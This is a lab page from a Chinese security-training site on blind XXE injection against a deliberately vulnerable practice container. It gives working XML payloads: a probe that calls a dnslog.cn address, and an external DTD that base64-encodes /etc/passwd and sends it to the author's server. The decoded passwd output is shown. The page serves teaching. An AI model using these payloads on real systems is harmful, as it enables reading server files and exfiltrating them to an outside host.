XXE漏洞-XXE盲注-XXE命令执行-网络安全培训必火安全学院

XXE漏洞二：盲注

本页面漏洞需要开启docker容器并开启apache服务，默认已经开启，如果有问题请联系管理员必火,微信：bihuoceo

接收端PHP源码如下：大家注意，这里并没有漏洞一中的输出 echo $xxe->login;也就是没有回显


                查看源代码

一中的漏洞利用代码显然这里无法使用，不信你试试(#^.^#)：


                <?xml version="1.0" encoding="utf-8"?>  

                <!DOCTYPE note[

                <!ENTITY xxe SYSTEM "file:///etc/passwd">

                ]>

                <bihuo><login>&xxe;</login></bihuo>

快速判断是否存在XXE漏洞，可以使用dnslog.cn判断：


                <?xml version="1.0" encoding="utf-8"?>  

                <!DOCTYPE note[

                <!ENTITY xxe SYSTEM "http://zkmd8w.dnslog.cn:80/hello">

                ]>

                <bihuo><login>&xxe;</login></bihuo>

怎么办？需要你自己有一台公网的服务器,本站拿www.hacker.wang举例,在公网服务器建立一个文件xxe.dtd,内容如下,我们来获取目标的/etc/passwd信息


                <!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> 
 
                <!ENTITY % int "<!ENTITY trick SYSTEM 'http://www.hacker.wang/old/xxe/xxe.php?xxx=%payload;'>">  

                %int;

本页面执行以下代码：


                <?xml version="1.0" encoding="UTF-8"?>  

                <!DOCTYPE bihuo [<!ENTITY % remote SYSTEM "http://www.hacker.wang/old/xxe/xxe.dtd"> %remote;]>   

                <bihuo><xxx> &trick;</xxx> </bihuo>

base64解码后结果如下：


            root:x:0:0:root:/root:/bin/bash
            daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
            bin:x:2:2:bin:/bin:/usr/sbin/nologin
            sys:x:3:3:sys:/dev:/usr/sbin/nologin
            sync:x:4:65534:sync:/bin:/bin/sync
            games:x:5:60:games:/usr/games:/usr/sbin/nologin
            man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
            lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
            mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
            news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
            uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
            proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
            www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
            backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
            list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
            irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
            gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
            nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
            systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
            systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
            systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
            systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
            sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

当然你也可以查看 http://www.hacker.wang/old/xxe/xxe.php?xxx=%payload; 传值的参数，去查看日志服务器
日志已经写到文件里：http://www.hacker.wang/old/xxe/xxx.txt http://www.hacker.wang/old/xxe/xxx.txt

津公网安备 12011602000477号津ICP备17008032号-2
本站一切信息皆遵守中华人民共和国法律，如发现任何不良信息，请拨打电话：18622800700
网络安全培训、企业合作、院校合作: 15320004362（手机同微信）